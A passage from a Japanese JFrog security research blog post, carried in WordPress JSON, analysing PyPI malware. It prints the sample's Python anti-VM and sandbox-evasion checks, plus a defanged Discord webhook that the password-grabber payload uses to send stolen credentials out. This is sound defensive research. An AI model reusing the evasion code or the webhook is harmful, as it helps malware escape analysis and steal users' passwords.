\u304c\u5b9f\u884c\u3055\u308c\u3066\u3044\u308b\u304b\u3069\u3046\u304b\u3092\u30c1\u30a7\u30c3\u30af\u3057\u307e\u3059<\/p>\n<p><strong>check_registry<\/strong>\u306f\u3001\u4eee\u60f3\u30de\u30b7\u30f3\u304c\u4f7f\u7528\u3059\u308b\u30ad\u30fc\u3092\u63a2\u3057\u307e\u3059\u3002\u4f8b\u3048\u3070\u3001VMWare\u30c9\u30e9\u30a4\u30d0\u304c\u30a4\u30f3\u30b9\u30c8\u30fc\u30eb\u3055\u308c\u305f\u3068\u304d\u306b\u8ffd\u52a0\u3055\u308c\u308b\u6b21\u306e\u3088\u3046\u306a<a href=\"https:\/\/evasions.checkpoint.com\/techniques\/registry.html\">\u6709\u540d\u306a<\/a>\u30ec\u30b8\u30b9\u30c8\u30ea\u30fb\u30ad\u30fc\u306a\u3069\u304c\u5bfe\u8c61\u3068\u306a\u308a\u307e\u3059\u3002<br \/>\n<strong>HKEY_LOCAL_MACHINE\\SYSTEM\\<\/strong><br \/>\n<strong>ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\DriverDesc<\/strong><\/p>\n<pre class=\"language-python\"><code>def check_registry():\r\n    if system(\"REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\DriverDesc 2&gt; nul\") != 1 and system(\"REG QUERY HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\ControlSet001\\\\Control\\\\Class\\\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\\\0000\\\\ProviderName 2&gt; nul\") != 1:exit_program('Detected Vm')\r\n    handle = OpenKey(HKEY_LOCAL_MACHINE, 'SYSTEM\\\\CurrentControlSet\\\\Services\\\\Disk\\\\Enum')\r\n    try:\r\n        if \"VMware\" in QueryValueEx(handle, '0')[0] or \"VBOX\" in QueryValueEx(handle, '0')[0]: exit_program('Detected Vm')\r\n    finally: CloseKey(handle)<\/code><\/pre>\n<p><strong>check_specs<\/strong>\u95a2\u6570\u306f\u3001\u73fe\u5728\u306e\u30de\u30b7\u30f3\u306e\u4f7f\u7528\u72b6\u6cc1\u3092\u5206\u6790\u3057\u307e\u3059\u3002<\/p>\n<pre class=\"language-python\"><code>def check_specs():\r\n    if int(str(virtual_memory()[0]\/1024\/1024\/1024).split(\".\")[0]) &lt;= 4: exit_program('Memory Ammount Invalid')\r\n    if int(str(disk_usage('\/')[0]\/1024\/1024\/1024).split(\".\")[0]) &lt;= 50: exit_program('Storage Ammount Invalid')\r\n    if int(cpu_count()) &lt;= 1: exit_program('Cpu Counts Invalid')<\/code><\/pre>\n<p>\u30e1\u30e2\u30ea\u3084\u30c7\u30a3\u30b9\u30af\u306e\u5bb9\u91cf\u304c\u5c11\u306a\u3044\u5834\u5408\u3084\u3001CPU\u304c1\u3064\u3057\u304b\u306a\u3044\u5834\u5408\u306f\u3001\u4eee\u60f3\u30de\u30b7\u30f3\u5185\u3067\u30d7\u30ed\u30bb\u30b9\u304c\u52d5\u4f5c\u3057\u3066\u3044\u308b\u3068\u5224\u65ad\u3057\u307e\u3059\u3002<\/p>\n<p>\u4e0a\u8a18\u306e\u30c1\u30a7\u30c3\u30af\u306f\u3059\u3079\u3066\u6bd4\u8f03\u7684\u7c21\u5358\u306a\u3082\u306e\u3067\u3059\u304c\u3001\u3053\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u304c\u3059\u3067\u306b\u63a1\u7528\u3057\u3066\u3044\u308b\u9759\u7684\u89e3\u6790\u306b\u5bfe\u3059\u308b\u5341\u5206\u306a\u9632\u5fa1\u6a5f\u80fd\u306b\u3088\u308a\u3001\u7d4c\u9a13\u304c\u5c11\u306a\u3044\u30ea\u30b5\u30fc\u30c1\u30e3\u30fc\u3001\u7279\u306b\u3053\u306e\u7279\u5b9a\u306e\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u9632\u5fa1\u3092\u7834\u308b\u3053\u3068\u304c\u3067\u304d\u306a\u3044\u81ea\u52d5\u89e3\u6790\u30c4\u30fc\u30eb\u3057\u304b\u4f7f\u7528\u3057\u305f\u3053\u3068\u306e\u306a\u3044\u30ea\u30b5\u30fc\u30c1\u30e3\u30fc\u306b\u5bfe\u3059\u308b\u5341\u5206\u306a\u9632\u5fa1\u6a5f\u80fd\u3092\u63d0\u4f9b\u3057\u307e\u3059\u3002<\/p>\n<h2>\u30da\u30a4\u30ed\u30fc\u30c9 &#8211; \u30b7\u30f3\u30d7\u30eb\u306a\u30d1\u30b9\u30ef\u30fc\u30c9\u30b0\u30e9\u30d0\u30fc<\/h2>\n<p>\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u30de\u30eb\u30a6\u30a7\u30a2\u304c\u4f7f\u7528\u3059\u308b\u9632\u5fa1\u529b\u306e\u9ad8\u3055\u306b\u6bd4\u3079\u3066\u6b8b\u5ff5\u306a\u307b\u3069\u5358\u7d14\u3067\u3059\u304c\u3001\u305d\u308c\u3067\u3082\u6709\u5bb3\u3067\u3059\u3002\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u30d1\u30b9\u30ef\u30fc\u30c9\u30b0\u30e9\u30d0\u30fc\u3067\u3001\u4e00\u822c\u7684\u306a\u30d6\u30e9\u30a6\u30b6\u306e\u30c7\u30fc\u30bf\u30ad\u30e3\u30c3\u30b7\u30e5\u306b\u4fdd\u5b58\u3055\u308c\u3066\u3044\u308b\u81ea\u52d5\u5165\u529b\u3055\u308c\u308b\u30d1\u30b9\u30ef\u30fc\u30c9\u3092\u53ce\u96c6\u3057\u3001C2\u30b5\u30fc\u30d0\uff08\u3053\u306e\u5834\u5408\u306fDiscord\u30d5\u30c3\u30af\uff09\u306b\u9001\u4fe1\u3057\u307e\u3059\u3002<br \/>\n<strong>https[:\/\/]discord[.]com\/api\/webhooks\/1039353898445582376\/cvrsu8CslmIYzNyXMpkjbkNEy_O0yjg08x5R_a7mPdgooQquALPINn1YfD5CuJ11dM7h)<\/strong>.<\/p>\n<p>\u30de\u30eb\u30a6\u30a7\u30a2\u304b\u3089\u62bd\u51fa\u3055\u308c\u305f\u6587\u5b57\u5217\u304b\u3089\u3001\u300c\u696d\u754c\u6a19\u6e96\u300d\u306eDiscord\u30c8\u30fc\u30af\u30f3\u6f0f\u6d29\u6a5f\u80fd\u306b\u52a0\u3048\u3001<strong>send_info<\/strong>\u95a2\u6570\u3067\u4f7f\u7528\u3055\u308c\u308b\u6587\u5b57\u5217\u304b\u3089\u5206\u304b\u308b\u3088\u3046\u306b\u3001\u3053\u306e\u30da\u30a4\u30ed\u30fc\u30c9\u306f\u3001\u8907\u6570\u306e<strong>\u91d1\u878d\u30b5\u30fc\u30d3\u30b9<\/strong>\u306e\u30d1\u30b9\u30ef\u30fc\u30c9\u3082\u63a2\u3063\u3066\u3044\u308b\u3053\u3068\u304c\u63a8\u6e2c\u3067\u304d\u307e\u3059\u3002 <\/p>\n<pre class=\"language-shell\"><code>Name: send_info\r\nFilename: \r\nArgument count: 0\r\n...\r\nConstants:\r\n0: None\r\n1: 'USERPROFILE'\r\n...\r\n5: 'coinbase'\r\n...\r\n7: 'binance'\r\n...\r\n9: 'paypal'\r\n...<\/code><\/pre>\n<h2>\u307e\u3068\u3081<\/h2>\n<p>\u30de\u30eb\u30a6\u30a7\u30a2\u958b\u767a\u8005\u306f\u3001\u5e38\u306b\u9032\u5316\u3092\u7d9a\u3051\u65b0\u3057\u3044\u56de\u907f\u65b9\u6cd5\u3092\u8ffd\u52a0\u3057\u3001\u30c4\u30fc\u30eb\u306e\u89e3\u6790\u304b\u3089\u9632\u5fa1\u3059\u308b\u305f\u3081\u306e\u65b0\u3057\u3044\u30ec\u30a4\u30e4\u30fc\u3092\u8ffd\u52a0\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u6539\u3081\u3066\u308f\u304b\u308a\u307e\u3059\u3002\u307b\u3093\u306e\u6570\u5e74\u524d\u307e\u3067\u306f\u3001PyPI\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u4f5c\u8005\u304c\u4f7f\u7528\u3059\u308b\u30c4\u30fc\u30eb\u3068\u3044\u3048\u3070\u3001\u30b7\u30f3\u30d7\u30eb\u306a\u30da\u30a4\u30ed\u30fc\u30c9\u30a8\u30f3\u30b3\u30fc\u30c0\u3060\u3051\u3067\u3057\u305f\u3002\u4eca\u65e5\u3001OSS\u30ea\u30dd\u30b8\u30c8\u30ea\u306b\u30a2\u30c3\u30d7\u30ed\u30fc\u30c9\u3055\u308c\u308b\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u3001\u3088\u308a\u8907\u96d1\u5316\u3057\u3001\u3044\u304f\u3064\u304b\u306e\u30ec\u30d9\u30eb\u306e\u9759\u7684\u304a\u3088\u3073\u52d5\u7684\u306a\u9632\u5fa1\u3092\u5099\u3048\u3001\u5546\u7528\u304a\u3088\u3073\u81ea\u4f5c\u306e\u30c4\u30fc\u30eb\u3092\u7d44\u307f\u5408\u308f\u305b\u3066\u5229\u7528\u3057\u3066\u3044\u308b\u3053\u3068\u304c\u308f\u304b\u308a\u307e\u3059\u3002\u3053\u308c\u306f\u3001\u30cd\u30a4\u30c6\u30a3\u30d6\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u4e16\u754c\u306b\u304a\u3051\u308b\u300c\u4ef2\u9593\u300d\u3068\u540c\u69d8\u3067\u3042\u308a\u3001OSS\u30ea\u30dd\u30b8\u30c8\u30ea\u578b\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u3001\u30ab\u30b9\u30bf\u30e0\u30dd\u30ea\u30e2\u30fc\u30d5\u30a3\u30c3\u30af\u30a8\u30f3\u30b3\u30fc\u30c7\u30a3\u30f3\u30b0\u3084\u3088\u308a\u9ad8\u5ea6\u306a\u30a2\u30f3\u30c1\u30c7\u30d0\u30c3\u30b0\u624b\u6cd5\u3068\u3044\u3063\u305f\u9ad8\u5ea6\u306a\u6280\u8853\u3092\u99c6\u4f7f\u3057\u3066\u3001\u4eca\u5f8c\u3082\u9032\u5316\u3092\u7d9a\u3051\u308b\u3053\u3068\u304c\u4e88\u60f3\u3055\u308c\u307e\u3059\u3002<\/p>\n<h2>JFrog\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30fb\u30ea\u30b5\u30fc\u30c1\u306e\u6700\u65b0\u60c5\u5831<\/h2>\n<p>JFrog\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30fb\u30ea\u30b5\u30fc\u30c1\u30c1\u30fc\u30e0\u304b\u3089\u306e\u6700\u65b0\u306e\u60c5\u5831\u306f\u3001<a href=\"https:\/\/jfrog.com\/blog\/tag\/security-research\/\">\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30fb\u30ea\u30b5\u30fc\u30c1\u306e\u30d6\u30ed\u30b0\u8a18\u4e8b<\/a>\u3084Twitter <a href=\"https:\/\/twitter.com\/JFrogSecurity\">@JFrogSecurity<\/a>\u304b\u3089\u3054\u89a7\u304f\u3060\u3055\u3044\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>JFrog\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30ea\u30b5\u30fc\u30c1\u30c1\u30fc\u30e0\u306f\u3001\u4eba\u6c17\u306e\u3042\u308b\u30aa\u30fc\u30d7\u30f3\u30bd\u30fc\u30b9\u30bd\u30d5\u30c8\u30a6\u30a7\u30a2\uff08OSS\uff09\u30ea\u30dd\u30b8\u30c8\u30ea\u3092\u81ea\u52d5\u5316\u30c4\u30fc\u30eb &hellip;<\/p>\n","protected":false},"author":448,"featured_media":105096,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"footnotes":""},"categories":[9833,9395],"tags":[10165,9796,9415],"class_list":["post-106411","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-security-and-devsecops-ja","category-xray-ja-2","tag-pypi-2","tag-9796","tag-9415"],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v22.6 (Yoast SEO v22.6) - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>PyPI\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u30a2\u30f3\u30c1\u30c7\u30d0\u30c3\u30b0\u30c6\u30af\u30cb\u30c3\u30af | JFrog Japan<\/title>\n<meta name=\"description\" content=\"\u4eca\u65e5\u3001\u307b\u3068\u3093\u3069\u306ePyPI\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u3001\u539f\u59cb\u7684\u306a\u5909\u6570\u306e\u64cd\u4f5c\u304b\u3089\u6d17\u7df4\u3055\u308c\u305f\u30b3\u30fc\u30c9\u306e\u5e73\u5766\u5316\u3084\u30b9\u30c6\u30ac\u30ce\u30b0\u30e9\u30d5\u30a3\u6280\u8853\u307e\u3067\u3001\u69d8\u3005\u306a\u6280\u8853\u3092\u4f7f\u3063\u3066\u9759\u7684\u691c\u51fa\u3092\u56de\u907f\u3057\u3088\u3046\u3068\u3057\u307e\u3059\u3002\u3057\u304b\u3057\u3001\u52d5\u7684\u89e3\u6790\u30c4\u30fc\u30eb\u306f\u3001\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u9759\u7684\u9632\u5fa1\u306e\u30ec\u30a4\u30e4\u30fc\u3092\u7d20\u65e9\u304f\u53d6\u308a\u9664\u304d\u3001\u305d\u306e\u80cc\u5f8c\u306e\u30ed\u30b8\u30c3\u30af\u3092\u660e\u3089\u304b\u306b\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/jfrog.com\/ja\/wp-json\/wp\/v2\/posts\/106411\" \/>\n<meta property=\"og:locale\" content=\"ja_JP\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"PyPI\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u4f5c\u6210\u8005\u306b\u652f\u6301\u3055\u308c\u308b\u30a2\u30f3\u30c1\u30c7\u30d0\u30c3\u30b0\u306e\u30c6\u30af\u30cb\u30c3\u30af\" \/>\n<meta property=\"og:description\" content=\"\u4eca\u65e5\u3001\u307b\u3068\u3093\u3069\u306ePyPI\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u3001\u539f\u59cb\u7684\u306a\u5909\u6570\u306e\u64cd\u4f5c\u304b\u3089\u6d17\u7df4\u3055\u308c\u305f\u30b3\u30fc\u30c9\u306e\u5e73\u5766\u5316\u3084\u30b9\u30c6\u30ac\u30ce\u30b0\u30e9\u30d5\u30a3\u6280\u8853\u307e\u3067\u3001\u69d8\u3005\u306a\u6280\u8853\u3092\u4f7f\u3063\u3066\u9759\u7684\u691c\u51fa\u3092\u56de\u907f\u3057\u3088\u3046\u3068\u3057\u307e\u3059\u3002\u3057\u304b\u3057\u3001\u52d5\u7684\u89e3\u6790\u30c4\u30fc\u30eb\u306f\u3001\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u9759\u7684\u9632\u5fa1\u306e\u30ec\u30a4\u30e4\u30fc\u3092\u7d20\u65e9\u304f\u53d6\u308a\u9664\u304d\u3001\u305d\u306e\u80cc\u5f8c\u306e\u30ed\u30b8\u30c3\u30af\u3092\u660e\u3089\u304b\u306b\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\" \/>\n<meta property=\"og:url\" content=\"https:\/\/jfrog.com\/ja\/blog\/pypi-malware-creators-are-starting-to-employ-anti-debug-techniques\/\" \/>\n<meta property=\"og:site_name\" content=\"JFrog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/artifrog\" \/>\n<meta property=\"article:published_time\" content=\"2022-12-30T03:20:04+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/speedmedia.jfrog.com\/08612fe1-9391-4cf3-ac1a-6dd49c36b276\/http:\/\/media.jfrog.com\/wp-content\/uploads\/2022\/12\/13183852\/PyPI-malware-are-starting-to-employ-Anti-Debug-techniques-203x148-1.png\" \/>\n\t<meta property=\"og:image:width\" content=\"203\" \/>\n\t<meta property=\"og:image:height\" content=\"148\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"satoy\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@jfrog\" \/>\n<meta name=\"twitter:site\" content=\"@jfrog\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"satoy\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/jfrog.com\/ja\/blog\/pypi-malware-creators-are-starting-to-employ-anti-debug-techniques\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/jfrog.com\/ja\/blog\/pypi-malware-creators-are-starting-to-employ-anti-debug-techniques\/\"},\"author\":{\"name\":\"satoy\",\"@id\":\"https:\/\/jfrog.com\/ja\/#\/schema\/person\/43b1ce9ab6149ce238061dd78a60d89c\"},\"headline\":\"PyPI\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u4f5c\u6210\u8005\u306b\u652f\u6301\u3055\u308c\u308b\u30a2\u30f3\u30c1\u30c7\u30d0\u30c3\u30b0\u306e\u30c6\u30af\u30cb\u30c3\u30af\",\"datePublished\":\"2022-12-30T03:20:04+00:00\",\"dateModified\":\"2022-12-30T03:20:04+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/jfrog.com\/ja\/blog\/pypi-malware-creators-are-starting-to-employ-anti-debug-techniques\/\"},\"wordCount\":160,\"publisher\":{\"@id\":\"https:\/\/jfrog.com\/ja\/#organization\"},\"image\":{\"@id\":\"https:\/\/jfrog.com\/ja\/blog\/pypi-malware-creators-are-starting-to-employ-anti-debug-techniques\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/speedmedia2.jfrog.com\/08612fe1-9391-4cf3-ac1a-6dd49c36b276\/media.jfrog.com\/wp-content\/uploads\/2022\/12\/13183852\/PyPI-malware-are-starting-to-employ-Anti-Debug-techniques-203x148-1.png\",\"keywords\":[\"PyPI\",\"\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\u30ea\u30b5\u30fc\u30c1\",\"\u30bb\u30ad\u30e5\u30ea\u30c6\u30a3\"],\"articleSection\":[\"Security and DevSecOps\",\"Xray\"],\"inLanguage\":\"ja\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/jfrog.com\/ja\/blog\/pypi-malware-creators-are-starting-to-employ-anti-debug-techniques\/\",\"url\":\"https:\/\/jfrog.com\/ja\/blog\/pypi-malware-creators-are-starting-to-employ-anti-debug-techniques\/\",\"name\":\"PyPI\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u30a2\u30f3\u30c1\u30c7\u30d0\u30c3\u30b0\u30c6\u30af\u30cb\u30c3\u30af | JFrog Japan\",\"isPartOf\":{\"@id\":\"https:\/\/jfrog.com\/ja\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/jfrog.com\/ja\/blog\/pypi-malware-creators-are-starting-to-employ-anti-debug-techniques\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/jfrog.com\/ja\/blog\/pypi-malware-creators-are-starting-to-employ-anti-debug-techniques\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/speedmedia2.jfrog.com\/08612fe1-9391-4cf3-ac1a-6dd49c36b276\/media.jfrog.com\/wp-content\/uploads\/2022\/12\/13183852\/PyPI-malware-are-starting-to-employ-Anti-Debug-techniques-203x148-1.png\",\"datePublished\":\"2022-12-30T03:20:04+00:00\",\"dateModified\":\"2022-12-30T03:20:04+00:00\",\"description\":\"\u4eca\u65e5\u3001\u307b\u3068\u3093\u3069\u306ePyPI\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u3001\u539f\u59cb\u7684\u306a\u5909\u6570\u306e\u64cd\u4f5c\u304b\u3089\u6d17\u7df4\u3055\u308c\u305f\u30b3\u30fc\u30c9\u306e\u5e73\u5766\u5316\u3084\u30b9\u30c6\u30ac\u30ce\u30b0\u30e9\u30d5\u30a3\u6280\u8853\u307e\u3067\u3001\u69d8\u3005\u306a\u6280\u8853\u3092\u4f7f\u3063\u3066\u9759\u7684\u691c\u51fa\u3092\u56de\u907f\u3057\u3088\u3046\u3068\u3057\u307e\u3059\u3002\u3057\u304b\u3057\u3001\u52d5\u7684\u89e3\u6790\u30c4\u30fc\u30eb\u306f\u3001\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u9759\u7684\u9632\u5fa1\u306e\u30ec\u30a4\u30e4\u30fc\u3092\u7d20\u65e9\u304f\u53d6\u308a\u9664\u304d\u3001\u305d\u306e\u80cc\u5f8c\u306e\u30ed\u30b8\u30c3\u30af\u3092\u660e\u3089\u304b\u306b\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002\",\"breadcrumb\":{\"@id\":\"https:\/\/jfrog.com\/ja\/blog\/pypi-malware-creators-are-starting-to-employ-anti-debug-techniques\/#breadcrumb\"},\"inLanguage\":\"ja\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/jfrog.com\/ja\/blog\/pypi-malware-creators-are-starting-to-employ-anti-debug-techniques\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"ja\",\"@id\":\"https:\/\/jfrog.com\/ja\/blog\/pypi-malware-creators-are-starting-to-employ-anti-debug-techniques\/#primaryimage\",\"url\":\"https:\/\/speedmedia2.jfrog.com\/08612fe1-9391-4cf3-ac1a-6dd49c36b276\/media.jfrog.com\/wp-content\/uploads\/2022\/12\/13183852\/PyPI-malware-are-starting-to-employ-Anti-Debug-techniques-203x148-1.png\",\"contentUrl\":\"https:\/\/speedmedia2.jfrog.com\/08612fe1-9391-4cf3-ac1a-6dd49c36b276\/media.jfrog.com\/wp-content\/uploads\/2022\/12\/13183852\/PyPI-malware-are-starting-to-employ-Anti-Debug-techniques-203x148-1.png\",\"width\":203,\"height\":148,\"caption\":\"PyPI malware are starting to employ Anti-Debug techniques\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/jfrog.com\/ja\/blog\/pypi-malware-creators-are-starting-to-employ-anti-debug-techniques\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/jfrog.com\/ja\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"PyPI\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u4f5c\u6210\u8005\u306b\u652f\u6301\u3055\u308c\u308b\u30a2\u30f3\u30c1\u30c7\u30d0\u30c3\u30b0\u306e\u30c6\u30af\u30cb\u30c3\u30af\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/jfrog.com\/ja\/#website\",\"url\":\"https:\/\/jfrog.com\/ja\/\",\"name\":\"JFrog\",\"description\":\"Deliver Trusted Software Releases at Speed and Scale\",\"publisher\":{\"@id\":\"https:\/\/jfrog.com\/ja\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/jfrog.com\/ja\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"ja\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/jfrog.com\/ja\/#organization\",\"name\":\"JFrog\",\"url\":\"https:\/\/jfrog.com\/ja\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"ja\",\"@id\":\"https:\/\/jfrog.com\/ja\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/speedmedia2.jfrog.com\/08612fe1-9391-4cf3-ac1a-6dd49c36b276\/media.jfrog.com\/wp-content\/uploads\/2025\/05\/27095207\/Logo.svg\",\"contentUrl\":\"https:\/\/speedmedia2.jfrog.com\/08612fe1-9391-4cf3-ac1a-6dd49c36b276\/media.jfrog.com\/wp-content\/uploads\/2025\/05\/27095207\/Logo.svg\",\"width\":74,\"height\":73,\"caption\":\"JFrog\"},\"image\":{\"@id\":\"https:\/\/jfrog.com\/ja\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/artifrog\",\"https:\/\/x.com\/jfrog\",\"https:\/\/www.linkedin.com\/company\/455737\",\"https:\/\/www.youtube.com\/channel\/UCh2hNg76zo3d1qQqTWIQxDg\",\"https:\/\/www.wikidata.org\/wiki\/Q98608948\"],\"description\":\"We set out on our Liquid Software journey in 2008, with the mission to transform the way enterprises manage and release software updates. The world expects software to update continuously, securely, non-intrusively and without user intervention. This hyper-connected experience can only be enabled by automation with an end-to-end DevOps platform and a binary-centric focus. With this in mind, we\u2019ve developed the JFrog Platform, ushering in a new era of DevOps and DevSecOps standards that power continuous updates. More than a decade after our founding, with thousands of customers and millions of users globally, JFrog has become the \u201cDatabase of DevOps\u201d and the de-facto standard in release and update management.\",\"legalName\":\"Jfrog, Inc.\",\"numberOfEmployees\":{\"@type\":\"QuantitativeValue\",\"minValue\":\"1001\",\"maxValue\":\"5000\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/jfrog.com\/ja\/#\/schema\/person\/43b1ce9ab6149ce238061dd78a60d89c\",\"name\":\"satoy\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"ja\",\"@id\":\"https:\/\/jfrog.com\/ja\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/53906f0995a35ce4ad703fc2eb1cdb130381259c17de328cca48e12c814c445a?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/53906f0995a35ce4ad703fc2eb1cdb130381259c17de328cca48e12c814c445a?s=96&d=mm&r=g\",\"caption\":\"satoy\"}}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"PyPI\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u30a2\u30f3\u30c1\u30c7\u30d0\u30c3\u30b0\u30c6\u30af\u30cb\u30c3\u30af | JFrog Japan","description":"\u4eca\u65e5\u3001\u307b\u3068\u3093\u3069\u306ePyPI\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u3001\u539f\u59cb\u7684\u306a\u5909\u6570\u306e\u64cd\u4f5c\u304b\u3089\u6d17\u7df4\u3055\u308c\u305f\u30b3\u30fc\u30c9\u306e\u5e73\u5766\u5316\u3084\u30b9\u30c6\u30ac\u30ce\u30b0\u30e9\u30d5\u30a3\u6280\u8853\u307e\u3067\u3001\u69d8\u3005\u306a\u6280\u8853\u3092\u4f7f\u3063\u3066\u9759\u7684\u691c\u51fa\u3092\u56de\u907f\u3057\u3088\u3046\u3068\u3057\u307e\u3059\u3002\u3057\u304b\u3057\u3001\u52d5\u7684\u89e3\u6790\u30c4\u30fc\u30eb\u306f\u3001\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u9759\u7684\u9632\u5fa1\u306e\u30ec\u30a4\u30e4\u30fc\u3092\u7d20\u65e9\u304f\u53d6\u308a\u9664\u304d\u3001\u305d\u306e\u80cc\u5f8c\u306e\u30ed\u30b8\u30c3\u30af\u3092\u660e\u3089\u304b\u306b\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/jfrog.com\/ja\/wp-json\/wp\/v2\/posts\/106411","og_locale":"ja_JP","og_type":"article","og_title":"PyPI\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u4f5c\u6210\u8005\u306b\u652f\u6301\u3055\u308c\u308b\u30a2\u30f3\u30c1\u30c7\u30d0\u30c3\u30b0\u306e\u30c6\u30af\u30cb\u30c3\u30af","og_description":"\u4eca\u65e5\u3001\u307b\u3068\u3093\u3069\u306ePyPI\u30de\u30eb\u30a6\u30a7\u30a2\u306f\u3001\u539f\u59cb\u7684\u306a\u5909\u6570\u306e\u64cd\u4f5c\u304b\u3089\u6d17\u7df4\u3055\u308c\u305f\u30b3\u30fc\u30c9\u306e\u5e73\u5766\u5316\u3084\u30b9\u30c6\u30ac\u30ce\u30b0\u30e9\u30d5\u30a3\u6280\u8853\u307e\u3067\u3001\u69d8\u3005\u306a\u6280\u8853\u3092\u4f7f\u3063\u3066\u9759\u7684\u691c\u51fa\u3092\u56de\u907f\u3057\u3088\u3046\u3068\u3057\u307e\u3059\u3002\u3057\u304b\u3057\u3001\u52d5\u7684\u89e3\u6790\u30c4\u30fc\u30eb\u306f\u3001\u30de\u30eb\u30a6\u30a7\u30a2\u306e\u9759\u7684\u9632\u5fa1\u306e\u30ec\u30a4\u30e4\u30fc\u3092\u7d20\u65e9\u304f\u53d6\u308a\u9664\u304d\u3001\u305d\u306e\u80cc\u5f8c\u306e\u30ed\u30b8\u30c3\u30af\u3092\u660e\u3089\u304b\u306b\u3059\u308b\u3053\u3068\u304c\u3067\u304d\u307e\u3059\u3002","og_url":"https:\/\/jfrog.com\/ja\/blog\/pypi-malware-creators-are-starting-to-employ-anti-debug-techniques\/","og_site_name":"JFrog","article_publisher":"https:\/\/www.facebook.com\/artifrog","article_published_time":"2022-12-30T03:20:04+00:00","og_image":[{"width":203,"height":148,"url":"https:\/\/speedmedia.jfrog.com